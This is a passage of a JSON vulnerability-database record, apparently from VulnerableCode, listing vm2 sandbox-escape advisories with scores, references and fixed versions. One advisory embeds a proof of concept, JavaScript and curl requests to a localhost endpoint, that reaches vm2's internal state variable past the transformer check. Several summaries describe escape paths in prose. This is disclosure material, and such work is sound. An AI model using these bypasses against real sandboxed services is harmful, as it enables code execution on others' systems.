-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/issues/467"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scorin
g_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36067","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36067"},{"reference_url":"https://security.netapp.com/advisory/ntap-20221017-0002","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20221017-0002"},{"reference_url":"https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2124794","reference_id":"2124794","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2124794"},{"reference_url":"h
ttps://github.com/advisories/GHSA-mrgp-mrhc-5jrq","reference_id":"GHSA-mrgp-mrhc-5jrq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mrgp-mrhc-5jrq"},{"reference_url":"https://security.netapp.com/advisory/ntap-20221017-0002/","reference_id":"ntap-20221017-0002","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-22T15:37:00Z/"}],"url":"https://security.netapp.com/advisory/ntap-20221017-0002/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/145543?format=json","purl":"pkg:npm/vm2@3.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.11"}],"aliases":["CVE-2022-36067","GHSA-mrgp-mrhc-5jrq"],"risk
_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jv3n-721k-z3h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45650?format=json","vulnerability_id":"VCID-ku6f-9qqg-aqe6","summary":"vm2 Sandbox Escape vulnerability\nIn vm2 for versions up to 3.9.19, `Promise` handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37466.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37466.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37466","reference_id":"","reference_type":"","scores":[{"value":"0.04929","scoring_system":"epss","scoring_elements":"0.8983","published_at":"2026-06-09T12:55:00Z"},{"value":"0.04929","scoring_system":"epss","scoring_elements":"0.89816","published_at":"2026-06-06T12:55:00Z"},{"value":"0.04929","scoring_system":"epss","scoring_elements":"0.89814","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37466"},{"reference_url":"https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scorin
g_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-15T17:36:22Z/"}],"url":"https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-15T17:36:22Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.0"},{"reference_url":"https://security.netapp.com/advisory/ntap-20230831-0007","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20230831-0007"},{"reference_url":"https://security.netapp.com/advisory/ntap-20241108-0002","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20241108-0002"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2232376","reference_id":"2232376","reference_type":"","scores":[],"url":"ht
tps://bugzilla.redhat.com/show_bug.cgi?id=2232376"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37466","reference_id":"CVE-2023-37466","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37466"},{"reference_url":"https://github.com/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cchq-frgv-rjh5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-15T17:36:22Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66121?format=json","purl":"pkg:npm/vm2@3.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-
t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.0"}],"aliases":["CVE-2023-37466","GHSA-cchq-frgv-rjh5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ku6f-9qqg-aqe6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61344?format=json","vulnerability_id":"VCID-mvte-m5qa-budj","summary":"vm2: vm2: Arbitrary code execution due to sandbox escape vulnerability","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24120.json","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24120.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24120","reference_id":"","reference_type":"","scores":[{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31788","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31866","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31834","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31796","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00129","scoring_system":"epss","scoring_elements":"0.31764","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24120"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A
:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T01:00:04Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.10.5"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-05T01:00:04Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24120","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24120"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466529","reference_id":"2466529","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466529"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5","reference_id":"GHSA-cchq-frgv-rjh5","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_e
lements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5"},{"reference_url":"https://github.com/advisories/GHSA-qvjj-29qf-hp7p","reference_id":"GHSA-qvjj-29qf-hp7p","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qvjj-29qf-hp7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114464?format=json","purl":"pkg:npm/vm2@3.10.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-73yk-bmf3-d3e3"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d3fg-nauj-p3gk"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.10.5"}],"aliases":["CVE-2026-24120","GHSA-qvjj-29qf-hp7p"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mvte-m5qa-budj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94014?format=json","vulnerability_id":"VCID-ng7k-8x8k-pye1","summary":"vm2's Transformer Fast-Path Bypass Exposes Internal State Variable\n### Summary\nvm2's code transformer has a performance optimization that skips AST analysis when the code does not contain `catch`, `import`, or `async` keywords. 
This fast-path bypass allows sandboxed code to directly access the internal `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL` variable, which exposes internal security functions (`handleException`, `wrapWith`, `import`).\n\n### Details\nIn `lib/transformer.js:55-57`, a regex check `/\\b(?:catch|import|async)\\b/` determines whether AST transformation is needed. If the code does not contain any of these keywords, the transformer returns the code unmodified.\n\nWhen the fast-path is taken:\n1. **INTERNAL_STATE_NAME identifier check is bypassed**: The AST visitor that blocks access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL` never runs\n2. **`with` statement instrumentation is bypassed**: `with()` statements are not wrapped with `wrapWith()`, enabling scope manipulation\n3. The internal state object exposes: `handleException(e)`, `wrapWith(x)`, `import(what)`\n\nWhile these methods are currently defensive utilities (not direct escape vectors), this represents a complete bypass of a security control. 
Any future addition of a sensitive method to the internal state object would be immediately exploitable.\n\n### PoC\n\n**Library-level PoC (Node.js script — primary):**\n```javascript\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\n// Access internal state (bypassed — no catch/import/async keywords)\nconst result = vm.run(`\n  var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;\n  Object.keys(x).join(\",\")\n`);\nconsole.log(result); // \"wrapWith,handleException,import\"\n\n// Control test — blocked when catch keyword is present\ntry {\n  vm.run(`\n    try {\n      var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL;\n    } catch(e) { e.message }\n  `);\n} catch(e) {\n  console.log(e.message); // \"Use of internal vm2 state variable\"\n}\n```\n\n**HTTP demonstration:**\n```bash\n# Internal state access (bypassed)\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; Object.keys(x).join(\\\",\\\")\"}'\n# Result: \"wrapWith,handleException,import\"\n\n# Control test — blocked when catch keyword is present\ncurl -s -X POST http://localhost:3000/api/execute \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"try { var x = VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL; } catch(e) { e.message }\"}'\n# Result: {\"errors\":[\"Use of internal vm2 state variable\"]}\n```\n\n**Suggested fix:**\n```javascript\n// transformer.js:55 — add 'with' keyword and INTERNAL_STATE_NAME check\nif (!/\\b(?:catch|import|async|with)\\b/.test(code) && code.indexOf(INTERNAL_STATE_NAME) === -1) {\n    return {__proto__: null, code, hasAsync: false};\n}\n```\n\n### Impact\n- **Security Control Bypass**: The INTERNAL_STATE_NAME access restriction is completely ineffective when the code avoids 3 specific keywords.\n- **Defense-in-Depth Violation**: Internal security functions are exposed, creating a latent attack surface for future 
code changes.\n- **Scope**: All applications using vm2. No special configuration required.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44003","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15773","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15655","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15636","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15722","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15763","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44003"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssv
c","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T18:40:49Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44003","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44003"},{"reference_url":"https://github.com/advisories/GHSA-wp5r-2gw5-m7q7","reference_id":"GHSA-wp5r-2gw5-m7q7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wp5r-2gw5-m7q7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-44003","GHSA-wp5r-2gw5-m7q7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ng7k-8x8k-pye1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110434?format=json","vulnerability_id":"VCID-pfwa-v62j-cyds","summary":"vm2 before 3.6.11 vulnerable to sandbox escape\nThis affects the package vm2 before 3.6.11. It is possible to trigger a RangeError exception from the host rather than the \"sandboxed\" context by reaching the stack call limit with an infinite recursion. 
The returned object is then used to reference the mainModule property of the host code running the script allowing it to spawn a child_process and execute arbitrary code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10761","reference_id":"","reference_type":"","scores":[{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74734","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74743","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74717","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.7471","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74746","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00818","scoring_system":"epss","scoring_elements":"0.74741","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-10761"},{"reference_url":"https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://gist.github.com/JLLeitschuh/609bb2efaff22ed84fe182cf574c023a"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/4b22d704e4794af63a5a2d633385fd20948f6f90","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR
:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/commit/4b22d704e4794af63a5a2d633385fd20948f6f90"},{"reference_url":"https://github.com/patriksimek/vm2/issues/197","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/197"},{"reference_url":"https://github.com/patriksimek/vm2/issues/197#issuecomment-480643832","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/197#issuecomment-480643832"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10761","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-10761"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-VM2-473188","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-VM2-473188"},{"reference_url":"https://github.com/advisories/GHSA-wf5x-cr3r-xr77","reference_id":"GHSA-wf5x-cr3r-xr77","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wf5x-cr3r-xr77"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/149094?format=json
